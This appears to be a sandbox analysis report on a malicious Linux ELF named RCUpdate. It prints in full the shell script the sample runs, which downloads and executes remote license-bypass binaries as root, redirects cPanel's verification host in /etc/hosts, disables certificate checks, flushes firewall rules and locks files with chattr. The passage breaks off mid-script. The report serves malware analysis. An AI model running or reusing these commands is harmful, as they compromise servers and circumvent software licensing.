| File name: | RCUpdate |
| Full analysis: | https://app.any.run/tasks/36b6e3b4-da70-40cd-b30c-13d99c7aca48 |
| Verdict: | Malicious activity |
| Analysis date: | February 28, 2025, 08:47:12 |
| OS: | Ubuntu 22.04.2 LTS |
| MIME: | application/x-executable |
| File info: | ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, no section header |
| MD5: | F170B201F1FF0BD46B6CAE8CD86F0389 |
| SHA1: | 68CC6B85F18431831EA016EA25C2C6B3ED8D9E24 |
| SHA256: | A4A4739CDA2CCD51A7BCA64BDDA7482ACD9B3434E653D9285763DBBB9904F057 |
| SSDEEP: | 96:fDhtJn0FQwJ4NhuK9TQlFPeJ9Bjf5++BYL4pYr3uJbOY3+WBgqogidEwkILAUwhh:fDowr0lFPqL5FYLJr3Cp0k0AUwpzZ |
| .o | | | ELF Executable and Linkable format (generic) (49.8) |
|---|
| CPUArchitecture: | 32 bit |
|---|---|
| CPUByteOrder: | Little endian |
| ObjectFileType: | Executable file |
| CPUType: | i386 |
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 40664 | /bin/sh -c "sudo chown user /tmp/RCUpdate\.elf && chmod +x /tmp/RCUpdate\.elf && DISPLAY=:0 sudo -i /tmp/RCUpdate\.elf " | /usr/bin/dash | — | any-guest-agent |
User: user Integrity Level: UNKNOWN Exit code: 256 | ||||
| 40665 | sudo chown user /tmp/RCUpdate.elf | /usr/bin/sudo | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 40666 | chown user /tmp/RCUpdate.elf | /usr/bin/chown | — | sudo |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 40667 | chmod +x /tmp/RCUpdate.elf | /usr/bin/chmod | — | dash |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
| 40668 | sudo -i /tmp/RCUpdate.elf | /usr/bin/sudo | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 256 | ||||
| 40669 | /tmp/RCUpdate.elf -c " RED='\033[0;31m' GREEN='\033[0;32m' NC='\033[0m' rm -rf /usr/bin/tuslic_* rm -rf /etc/cron\.d/tuslic_* rm -rf /usr/bin/syspro rm -rf /etc/cron\.d/License* rm -rf /usr/bin/getlic_* rm -rf /etc/cron\.d/updategb if [ \! -f /usr/lib64/libcrypt\.so\.1 ]; then wget -O /root/\.libcrypt\.so\.1_Downloaded mirror\.resellercenter\.ir/libcrypt\.so\.1 > /dev/null 2>&1 if [[ \$(md5sum \"/root/\.libcrypt\.so\.1_Downloaded\") = 138250fcc612d3308435887aab306c93* ]] then cp /root/\.libcrypt\.so\.1_Downloaded /usr/lib64/libcrypt\.so\.1 fi fi if [ \! -f /usr/lib64/libfreebl3\.so ]; then wget -O /root/\.libfreebl3\.so_Downloaded mirror\.resellercenter\.ir/libfreebl3\.so > /dev/null 2>&1 if [[ \$(md5sum \"/root/\.libfreebl3\.so_Downloaded\") = 815e6cd788a31cba1de6495fc830d19e* ]] then cp /root/\.libfreebl3\.so_Downloaded /usr/lib64/libfreebl3\.so fi fi if [ -f /etc/lsb-release ]; then if [ \"\$1\" = \"\" ]; then echo \"\${RED}No product selected to be installed/updated\. \${NC}\" exit 1 fi if [ -f /etc/redhat-release ]; then upgradeCommand=\"yum \" elif [ -f /etc/lsb-release ]; then upgradeCommand=\"apt-get \" elif [ -f /etc/os-release ]; then upgradeCommand=\"apt-get \" fi x=\"echo \"\$1\" | tr '[:upper:]' '[:lower:]'\" cmd=\$(eval \"\$x\") if [ \"\${cmd}\" = \"cpanel\" ]; then echo \"\${GREEN}Installing cPanel licensing system \.\.\. \${NC}\" if [ \! -d /usr/local/cpanel/whostmgr ] then systemctl stop NetworkManager systemctl disable NetworkManager echo \"190\.2\.135\.87 verify\.cpanel\.net\" >> /etc/hosts echo \"check_certificate = off\" >> ~/\.wgetrc cd /home && curl -o latest -L https://securedownloads\.cpanel\.net/latest && sh latest sed -i '/190\.2\.135\.87 verify\.cpanel\.net/d' /etc/hosts fi wget -O /bin/RcLicenseCP https://sys\.resellercenter\.ir/RcLicenseCP > /dev/null 2>&1 chmod +x /bin/RcLicenseCP sleep 2 if [ \! -f /bin/RcLicenseCP ] then wget -O /usr/bin/RcLicenseCP https://cpanel\.resellercenter\.ir/cpanelv3/RcLicenseCP > /dev/null 2>&1 chmod +x /bin/RcLicenseCP echo \"done\" fi RcLicenseCP echo \"\${GREEN}cPanel licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"cloudlinux\" ]; then echo \"\${GREEN}Installing CloudLinux licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseCLN https://sys\.resellercenter\.ir/RcLicenseCLN > /dev/null 2>&1 chmod +x /bin/RcLicenseCLN RcLicenseCLN echo \"\${GREEN}CloudLinux licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"litespeed\" ]; then echo \"\${GREEN}Installing LiteSpeed licensing system \.\.\. \${NC}\" if [ \"\$upgradeCommand\" = \"yum \" ]; then \$upgradeCommand install iptables-services -y > /dev/null 2>&1 fi if [ \"\$upgradeCommand\" = \"apt-get \" ]; then \$upgradeCommand install iptables -y > /dev/null 2>&1 fi systemctl start iptables > /dev/null 2>&1 systemctl enable iptables > /dev/null 2>&1 wget -O /root/litespeedinstaller https://litespeed\.resellercenter\.ir/litespeedv3/installer > /dev/null 2>&1 chmod +x /root/litespeedinstaller /root/litespeedinstaller > /dev/null 2>&1 iptables -P INPUT ACCEPT > /dev/null 2>&1 iptables -P FORWARD ACCEPT > /dev/null 2>&1 iptables -P OUTPUT ACCEPT > /dev/null 2>&1 iptables -t nat -F > /dev/null 2>&1 iptables -t mangle -F > /dev/null 2>&1 iptables -F > /dev/null 2>&1 iptables -X > /dev/null 2>&1 wget -O /bin/RcLicenseLSWS https://sys\.resellercenter\.ir/RcLicenseLSWS > /dev/null 2>&1 chmod +x /bin/RcLicenseLSWS RcLicenseLSWS echo \"\${GREEN}LiteSpeed licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"jetbackup\" ]; then echo \"\${GREEN}Installing JetBackup licensing system \.\.\. \${NC}\" curl -LSs http://repo\.jetlicense\.com/static/install | bash if [ -d /usr/local/cpanel ] then jetapps --install jetbackup5-cpanel release elif [ -d /usr/local/directadmin ] then jetapps --install jetbackup5-directadmin release elif [ -d /usr/local/psa ] then jetapps --install jetbackup5-plesk release fi wget -O /bin/RcLicenseJetBackup https://sys\.resellercenter\.ir/RcLicenseJetBackup > /dev/null 2>&1 chmod +x /bin/RcLicenseJetBackup RcLicenseJetBackup echo \"\${GREEN}JetBackup licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"imunify360\" ] || [ \"\${cmd}\" = \"Imunify360\" ]; then echo \"\${GREEN}Installing Imunify360 licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseImunify360 https://sys\.resellercenter\.ir/RcLicenseImunify360 > /dev/null 2>&1 chmod +x /bin/RcLicenseImunify360 RcLicenseImunify360 echo \"\${GREEN}Imunify360 licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"softaculous\" ]; then echo \"\${GREEN}Installing Softaculous licensing system \.\.\. \${NC}\" wget -O install\.sh http://files\.softaculous\.com/install\.sh chmod 755 install\.sh \./install\.sh if [ -d /usr/local/cpanel ] then if [ \! -d /usr/local/cpanel/whostmgr/cgi/softaculous ] then echo \"\${RED}Softaculous did not installed\. Have you enabled Ioncube loader ? Please check : https://www\.softaculous\.com/docs/admin/installing-softaculous/ \${NC}\" exit 1; fi fi if [ -d /usr/local/directadmin ] then if [ \! -d /usr/local/directadmin/plugins/softaculous ] then echo \"\${RED}Softaculous did not installed\. Have you enabled Ioncube loader ? Please check : https://www\.softaculous\.com/docs/admin/installing-softaculous/ \${NC}\" exit 1; fi fi if [ -d /usr/local/psa ] then if [ \! -d /usr/local/softaculous ] then echo \"\${RED}Softaculous did not installed\. Have you enabled Ioncube loader ? Please check : https://www\.softaculous\.com/docs/admin/installing-softaculous/ \${NC}\" exit 1; fi fi wget -O /bin/RcLicenseSoftaculous https://sys\.resellercenter\.ir/RcLicenseSoftaculous > /dev/null 2>&1 chmod +x /bin/RcLicenseSoftaculous RcLicenseSoftaculous echo \"\${GREEN}Softaculous licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"sitepad\" ]; then echo \"\${GREEN}Installing Sitepad licensing system \.\.\. \${NC}\" wget -O install\.sh http://files\.sitepad\.com/install\.sh chmod 755 install\.sh \./install\.sh if [ \! -d /usr/local/sitepad ] then echo \"\${RED}SitePad did not installed\. Have you enabled Ioncube loader ? Please check : https://sitepad\.com/docs/admin/installing-sitepad/ \${NC}\" exit 1; fi wget -O /bin/RcLicenseSitepad https://sys\.resellercenter\.ir/RcLicenseSitepad > /dev/null 2>&1 chmod +x /bin/RcLicenseSitepad RcLicenseSitepad echo \"\${GREEN}Sitepad licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"virtualizor\" ]; then echo \"\${GREEN}Installing Virtualizor licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseVirtualizor https://sys\.resellercenter\.ir/RcLicenseVirtualizor > /dev/null 2>&1 chmod +x /bin/RcLicenseVirtualizor RcLicenseVirtualizor echo \"\${GREEN}Virtualizor licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"cpguard\" ]; then echo \"\${GREEN}Installing CPGuard licensing system \.\.\. \${NC}\" if [ -d /usr/local/cpanel ] then whmapi1 set_tweaksetting key=phploader value=ioncube,sourceguardian > /dev/null 2>&1 fi if [ \! -d /etc/cpguard ] then cd /usr/local/src && rm -f cpguard\.sh && curl -o cpguard\.sh -L https://mirror\.resellercenter\.ir/cpguard\.sh && chmod +x cpguard\.sh && \./cpguard\.sh install fi wget -O /bin/RcLicenseCPGuard https://sys\.resellercenter\.ir/RcLicenseCPGuard > /dev/null 2>&1 chmod +x /bin/RcLicenseCPGuard RcLicenseCPGuard echo \"\${GREEN}CPGuard licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"lslb\" ]; then echo \"\${GREEN}Installing LiteSpeed Load Balancer licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseLSLB https://sys\.resellercenter\.ir/RcLicenseLSLB > /dev/null 2>&1 chmod +x /bin/RcLicenseLSLB RcLicenseLSLB echo \"\${GREEN}LiteSpeed Load Balancer licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"whmreseller\" ]; then echo \"\${GREEN}Installing WHMReseller licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseWHMReseller https://sys\.resellercenter\.ir/RcLicenseWHMReseller > /dev/null 2>&1 chmod +x /bin/RcLicenseWHMReseller RcLicenseWHMReseller echo \"\${GREEN}WHMReseller licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"plesk\" ]; then echo \"\${GREEN}Installing Plesk licensing system \.\.\. \${NC}\" wget -O /bin/RcLicensePlesk https://sys\.resellercenter\.ir/RcLicensePlesk > /dev/null 2>&1 chmod +x /bin/RcLicensePlesk timeout 1 RcLicensePlesk &> /usr/local/RCBIN/\.file_status_rc if grep -q \"dumped core\" /usr/local/RCBIN/\.file_status_rc; then wget -O /bin/RcLicensePlesk https://sys\.resellercenter\.ir/RcLicensePlesk2 > /dev/null 2>&1 chmod +x /bin/RcLicensePlesk > /dev/null 2>&1 chattr +ia /bin/RcLicensePlesk > /dev/null 2>&1 chattr2 +ia /bin/RcLicensePlesk > /dev/null 2>&1 comp0 +ia /bin/RcLicensePlesk > /dev/null 2>&1 fi RcLicensePlesk echo \"\${GREEN}Plesk licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"directadmin\" ]; then echo \"\${GREEN}Installing DirectAdmin licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseDA https://sys\.resellercenter\.ir/RcLicenseDA > /dev/null 2>&1 chmod +x /bin/RcLicenseDA RcLicenseDA echo \"\${GREEN}DirectAdmin licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"dareseller\" ]; then echo \"\${GREEN}Installing DAReseller licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseDAReseller https://sys\.resellercenter\.ir/RcLicenseDAReseller > /dev/null 2>&1 chmod +x /bin/RcLicenseDAReseller RcLicenseDAReseller echo \"\${GREEN}DAReseller licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"osm\" ]; then echo \"\${GREEN}Installing OSM licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseOSM https://sys\.resellercenter\.ir/RcLicenseOSM > /dev/null 2>&1 chmod +x /bin/RcLicenseOSM RcLicenseOSM echo \"\${GREEN}OSM licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"cxs\" ]; then echo \"\${GREEN}Installing CXS licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseCXS https://sys\.resellercenter\.ir/RcLicenseCXS > /dev/null 2>&1 chmod +x /bin/RcLicenseCXS RcLicenseCXS echo \"\${GREEN}CXS licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"whmsonic\" ]; then echo \"\${GREEN}Installing WHMSonic licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseWHMSonic https://sys\.resellercenter\.ir/RcLicenseWHMSonic > /dev/null 2>&1 chmod +x /bin/RcLicenseWHMSonic RcLicenseWHMSonic echo \"\${GREEN}WHMSonic licensing system has been installed\. Enjoy \${NC}\" exit 0 fi echo \"\${RED}This product does not exist\! \${NC}\" exit 1 elif [ -f /etc/redhat-release ]; then if [ \"\$1\" == \"\" ]; then echo -e \"\${RED}No product selected to be installed/updated\. \${NC}\" exit 1 fi if [ -f /etc/redhat-release ]; then upgradeCommand=\"yum \" elif [ -f /etc/lsb-release ]; then upgradeCommand=\"apt-get \" elif [ -f /etc/os-release ]; then upgradeCommand=\"apt-get \" fi x=\"echo \"\$1\" | tr '[:upper:]' '[:lower:]'\" cmd=\$(eval \"\$x\") echo \${cmd} if [ \"\${cmd}\" == \"cpanel\" ]; then echo -e \"\${GREEN}Installing cPanel licensing system \.\.\. \${NC}\" if [ \! -d /usr/local/cpanel/whostmgr ] then systemctl stop NetworkManager systemctl disable NetworkManager echo \"190\.2\.135\.87 verify\.cpanel\.net\" >> /etc/hosts echo \"check_certificate = off\" >> ~/\.wgetrc cd /home && curl -o latest -L https://securedownloads\.cpanel\.net/latest && sh latest sed -i '/190\.2\.135\.87 verify\.cpanel\.net/d' /etc/hosts fi wget -O /bin/RcLicenseCP https://sys\.resellercenter\.ir/RcLicenseCP > /dev/null 2>&1 chmod +x /bin/RcLicenseCP sleep 2 if [ \! -f /bin/RcLicenseCP ] then wget -O /usr/bin/RcLicenseCP https://cpanel\.resellercenter\.ir/cpanelv3/RcLicenseCP > /dev/null 2>&1 chmod +x /bin/RcLicenseCP echo \"done\" fi RcLicenseCP echo -e \"\${GREEN}cPanel licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"cloudlinux\" ]; then echo -e \"\${GREEN}Installing CloudLinux licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseCLN https://sys\.resellercenter\.ir/RcLicenseCLN > /dev/null 2>&1 chmod +x /bin/RcLicenseCLN RcLicenseCLN echo -e \"\${GREEN}CloudLinux licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"litespeed\" ]; then echo -e \"\${GREEN}Installing LiteSpeed licensing system \.\.\. \${NC}\" if [ \"\$upgradeCommand\" == \"yum \" ]; then \$upgradeCommand install iptables-services -y > /dev/null 2>&1 fi if [ \"\$upgradeCommand\" == \"apt-get \" ]; then \$upgradeCommand install iptables -y > /dev/null 2>&1 fi systemctl start iptables > /dev/null 2>&1 systemctl enable iptables > /dev/null 2>&1 wget -O /root/litespeedinstaller https://litespeed\.resellercenter\.ir/litespeedv3/installer > /dev/null 2>&1 chmod +x /root/litespeedinstaller /root/litespeedinstaller > /dev/null 2>&1 iptables -P INPUT ACCEPT > /dev/null 2>&1 iptables -P FORWARD ACCEPT > /dev/null 2>&1 iptables -P OUTPUT ACCEPT > /dev/null 2>&1 iptables -t nat -F > /dev/null 2>&1 iptables -t mangle -F > /dev/null 2>&1 iptables -F > /dev/null 2>&1 iptables -X > /dev/null 2>&1 wget -O /bin/RcLicenseLSWS https://sys\.resellercenter\.ir/RcLicenseLSWS > /dev/null 2>&1 chmod +x /bin/RcLicenseLSWS RcLicenseLSWS echo -e \"\${GREEN}LiteSpeed licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"jetbackup\" ]; then echo -e \"\${GREEN}Installing JetBackup licensing system \.\.\. \${NC}\" curl -LSs http://repo\.jetlicense\.com/static/install | bash if [ -d /usr/local/cpanel ] then jetapps --install jetbackup5-cpanel release elif [ -d /usr/local/directadmin ] then jetapps --install jetbackup5-directadmin release elif [ -d /usr/local/psa ] then jetapps --install jetbackup5-plesk release fi wget -O /bin/RcLicenseJetBackup https://sys\.resellercenter\.ir/RcLicenseJetBackup > /dev/null 2>&1 chmod +x /bin/RcLicenseJetBackup RcLicenseJetBackup echo -e \"\${GREEN}JetBackup licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"imunify360\" ] || [ \"\${cmd}\" == \"Imunify360\" ]; then echo -e \"\${GREEN}Installing Imunify360 licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseImunify360 https://sys\.resellercenter\.ir/RcLicenseImunify360 > /dev/null 2>&1 chmod +x /bin/RcLicenseImunify360 RcLicenseImunify360 echo -e \"\${GREEN}Imunify360 licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"softaculous\" ]; then echo -e \"\${GREEN}Installing Softaculous licensing system \.\.\. \${NC}\" wget -O install\.sh http://files\.softaculous\.com/install\.sh chmod 755 install\.sh \./install\.sh if [ -d /usr/local/cpanel ] then if [ \! -d /usr/local/cpanel/whostmgr/cgi/softaculous ] then echo -e \"\${RED}Softaculous did not installed\. Have you enabled Ioncube loader ? Please check : https://www\.softaculous\.com/docs/admin/installing-softaculous/ \${NC}\" exit 1; fi fi if [ -d /usr/local/directadmin ] then if [ \! -d /usr/local/directadmin/plugins/softaculous ] then echo -e \"\${RED}Softaculous did not installed\. Have you enabled Ioncube loader ? Please check : https://www\.softaculous\.com/docs/admin/installing-softaculous/ \${NC}\" exit 1; fi fi if [ -d /usr/local/psa ] then if [ \! -d /usr/local/softaculous ] then echo -e \"\${RED}Softaculous did not installed\. Have you enabled Ioncube loader ? Please check : https://www\.softaculous\.com/docs/admin/installing-softaculous/ \${NC}\" exit 1; fi fi wget -O /bin/RcLicenseSoftaculous https://sys\.resellercenter\.ir/RcLicenseSoftaculous > /dev/null 2>&1 chmod +x /bin/RcLicenseSoftaculous RcLicenseSoftaculous echo -e \"\${GREEN}Softaculous licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"sitepad\" ]; then echo -e \"\${GREEN}Installing Sitepad licensing system \.\.\. \${NC}\" wget -O install\.sh http://files\.sitepad\.com/install\.sh chmod 755 install\.sh \./install\.sh if [ \! -d /usr/local/sitepad ] then echo -e \"\${RED}SitePad did not installed\. Have you enabled Ioncube loader ? Please check : https://sitepad\.com/docs/admin/installing-sitepad/ \${NC}\" exit 1; fi wget -O /bin/RcLicenseSitepad https://sys\.resellercenter\.ir/RcLicenseSitepad > /dev/null 2>&1 chmod +x /bin/RcLicenseSitepad RcLicenseSitepad echo -e \"\${GREEN}Sitepad licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"virtualizor\" ]; then echo -e \"\${GREEN}Installing Virtualizor licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseVirtualizor https://sys\.resellercenter\.ir/RcLicenseVirtualizor > /dev/null 2>&1 chmod +x /bin/RcLicenseVirtualizor RcLicenseVirtualizor echo -e \"\${GREEN}Virtualizor licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"cpguard\" ]; then echo -e \"\${GREEN}Installing CPGuard licensing system \.\.\. \${NC}\" if [ -d /usr/local/cpanel ] then whmapi1 set_tweaksetting key=phploader value=ioncube,sourceguardian > /dev/null 2>&1 fi if [ \! -d /etc/cpguard ] then cd /usr/local/src && rm -f cpguard\.sh && curl -o cpguard\.sh -L https://mirror\.resellercenter\.ir/cpguard\.sh && chmod +x cpguard\.sh && \./cpguard\.sh install fi wget -O /bin/RcLicenseCPGuard https://sys\.resellercenter\.ir/RcLicenseCPGuard > /dev/null 2>&1 chmod +x /bin/RcLicenseCPGuard RcLicenseCPGuard echo -e \"\${GREEN}CPGuard licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"lslb\" ]; then echo -e \"\${GREEN}Installing LiteSpeed Load Balancer licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseLSLB https://sys\.resellercenter\.ir/RcLicenseLSLB > /dev/null 2>&1 chmod +x /bin/RcLicenseLSLB RcLicenseLSLB echo -e \"\${GREEN}LiteSpeed Load Balancer licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"whmreseller\" ]; then echo -e \"\${GREEN}Installing WHMReseller licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseWHMReseller https://sys\.resellercenter\.ir/RcLicenseWHMReseller > /dev/null 2>&1 chmod +x /bin/RcLicenseWHMReseller RcLicenseWHMReseller echo -e \"\${GREEN}WHMReseller licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"plesk\" ]; then echo -e \"\${GREEN}Installing Plesk licensing system \.\.\. \${NC}\" wget -O /bin/RcLicensePlesk https://sys\.resellercenter\.ir/RcLicensePlesk > /dev/null 2>&1 chmod +x /bin/RcLicensePlesk timeout 1 RcLicensePlesk &> /usr/local/RCBIN/\.file_status_rc if grep -q \"dumped core\" /usr/local/RCBIN/\.file_status_rc; then wget -O /bin/RcLicensePlesk https://sys\.resellercenter\.ir/RcLicensePlesk2 > /dev/null 2>&1 chmod +x /bin/RcLicensePlesk > /dev/null 2>&1 chattr +ia /bin/RcLicensePlesk > /dev/null 2>&1 chattr2 +ia /bin/RcLicensePlesk > /dev/null 2>&1 comp0 +ia /bin/RcLicensePlesk > /dev/null 2>&1 fi RcLicensePlesk echo -e \"\${GREEN}Plesk licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"directadmin\" ]; then echo -e \"\${GREEN}Installing DirectAdmin licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseDA https://sys\.resellercenter\.ir/RcLicenseDA > /dev/null 2>&1 chmod +x /bin/RcLicenseDA RcLicenseDA echo -e \"\${GREEN}DirectAdmin licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"dareseller\" ]; then echo -e \"\${GREEN}Installing DAReseller licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseDAReseller https://sys\.resellercenter\.ir/RcLicenseDAReseller > /dev/null 2>&1 chmod +x /bin/RcLicenseDAReseller RcLicenseDAReseller echo -e \"\${GREEN}DAReseller licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"osm\" ]; then echo -e \"\${GREEN}Installing OSM licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseOSM https://sys\.resellercenter\.ir/RcLicenseOSM > /dev/null 2>&1 chmod +x /bin/RcLicenseOSM RcLicenseOSM echo -e \"\${GREEN}OSM licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"cxs\" ]; then echo -e \"\${GREEN}Installing CXS licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseCXS https://sys\.resellercenter\.ir/RcLicenseCXS > /dev/null 2>&1 chmod +x /bin/RcLicenseCXS RcLicenseCXS echo -e \"\${GREEN}CXS licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"whmsonic\" ]; then echo -e \"\${GREEN}Installing WHMSonic licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseWHMSonic https://sys\.resellercenter\.ir/RcLicenseWHMSonic > /dev/null 2>&1 chmod +x /bin/RcLicenseWHMSonic RcLicenseWHMSonic echo -e \"\${GREEN}WHMSonic licensing system has been installed\. Enjoy \${NC}\" exit 0 fi echo -e \"\${RED}This product does not exist\! \${NC}\" exit 1 elif [ -f /etc/os-release ]; then if [ \"\$1\" = \"\" ]; then echo \"\${RED}No product selected to be installed/updated\. \${NC}\" exit 1 fi if [ -f /etc/redhat-release ]; then upgradeCommand=\"yum \" elif [ -f /etc/lsb-release ]; then upgradeCommand=\"apt-get \" elif [ -f /etc/os-release ]; then upgradeCommand=\"apt-get \" fi x=\"echo \"\$1\" | tr '[:upper:]' '[:lower:]'\" cmd=\$(eval \"\$x\") if [ \"\${cmd}\" = \"cpanel\" ]; then echo \"\${GREEN}Installing cPanel licensing system \.\.\. \${NC}\" if [ \! -d /usr/local/cpanel/whostmgr ] then systemctl stop NetworkManager systemctl disable NetworkManager echo \"190\.2\.135\.87 verify\.cpanel\.net\" >> /etc/hosts echo \"check_certificate = off\" >> ~/\.wgetrc cd /home && curl -o latest -L https://securedownloads\.cpanel\.net/latest && sh latest sed -i '/190\.2\.135\.87 verify\.cpanel\.net/d' /etc/hosts fi wget -O /bin/RcLicenseCP https://sys\.resellercenter\.ir/RcLicenseCP > /dev/null 2>&1 chmod +x /bin/RcLicenseCP sleep 2 if [ \! -f /bin/RcLicenseCP ] then wget -O /usr/bin/RcLicenseCP https://cpanel\.resellercenter\.ir/cpanelv3/RcLicenseCP > /dev/null 2>&1 chmod +x /bin/RcLicenseCP echo \"done\" fi RcLicenseCP echo \"\${GREEN}cPanel licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"cloudlinux\" ]; then echo \"\${GREEN}Installing CloudLinux licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseCLN https://sys\.resellercenter\.ir/RcLicenseCLN > /dev/null 2>&1 chmod +x /bin/RcLicenseCLN RcLicenseCLN echo \"\${GREEN}CloudLinux licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"litespeed\" ]; then echo \"\${GREEN}Installing LiteSpeed licensing system \.\.\. \${NC}\" if [ \"\$upgradeCommand\" = \"yum \" ]; then \$upgradeCommand install iptables-services -y > /dev/null 2>&1 fi if [ \"\$upgradeCommand\" = \"apt-get \" ]; then \$upgradeCommand install iptables -y > /dev/null 2>&1 fi systemctl start iptables > /dev/null 2>&1 systemctl enable iptables > /dev/null 2>&1 wget -O /root/litespeedinstaller https://litespeed\.resellercenter\.ir/litespeedv3/installer > /dev/null 2>&1 chmod +x /root/litespeedinstaller /root/litespeedinstaller > /dev/null 2>&1 iptables -P INPUT ACCEPT > /dev/null 2>&1 iptables -P FORWARD ACCEPT > /dev/null 2>&1 iptables -P OUTPUT ACCEPT > /dev/null 2>&1 iptables -t nat -F > /dev/null 2>&1 iptables -t mangle -F > /dev/null 2>&1 iptables -F > /dev/null 2>&1 iptables -X > /dev/null 2>&1 wget -O /bin/RcLicenseLSWS https://sys\.resellercenter\.ir/RcLicenseLSWS > /dev/null 2>&1 chmod +x /bin/RcLicenseLSWS RcLicenseLSWS echo \"\${GREEN}LiteSpeed licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"jetbackup\" ]; then echo \"\${GREEN}Installing JetBackup licensing system \.\.\. \${NC}\" curl -LSs http://repo\.jetlicense\.com/static/install | bash if [ -d /usr/local/cpanel ] then jetapps --install jetbackup5-cpanel release elif [ -d /usr/local/directadmin ] then jetapps --install jetbackup5-directadmin release elif [ -d /usr/local/psa ] then jetapps --install jetbackup5-plesk release fi wget -O /bin/RcLicenseJetBackup https://sys\.resellercenter\.ir/RcLicenseJetBackup > /dev/null 2>&1 chmod +x /bin/RcLicenseJetBackup RcLicenseJetBackup echo \"\${GREEN}JetBackup licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" == \"imunify360\" ] || [ \"\${cmd}\" == \"Imunify360\" ]; then echo \"\${GREEN}Installing Imunify360 licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseImunify360 https://sys\.resellercenter\.ir/RcLicenseImunify360 > /dev/null 2>&1 chmod +x /bin/RcLicenseImunify360 RcLicenseImunify360 echo \"\${GREEN}Imunify360 licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"softaculous\" ]; then echo \"\${GREEN}Installing Softaculous licensing system \.\.\. \${NC}\" wget -O install\.sh http://files\.softaculous\.com/install\.sh chmod 755 install\.sh \./install\.sh if [ -d /usr/local/cpanel ] then if [ \! -d /usr/local/cpanel/whostmgr/cgi/softaculous ] then echo \"\${RED}Softaculous did not installed\. Have you enabled Ioncube loader ? Please check : https://www\.softaculous\.com/docs/admin/installing-softaculous/ \${NC}\" exit 1; fi fi if [ -d /usr/local/directadmin ] then if [ \! -d /usr/local/directadmin/plugins/softaculous ] then echo \"\${RED}Softaculous did not installed\. Have you enabled Ioncube loader ? Please check : https://www\.softaculous\.com/docs/admin/installing-softaculous/ \${NC}\" exit 1; fi fi if [ -d /usr/local/psa ] then if [ \! -d /usr/local/softaculous ] then echo 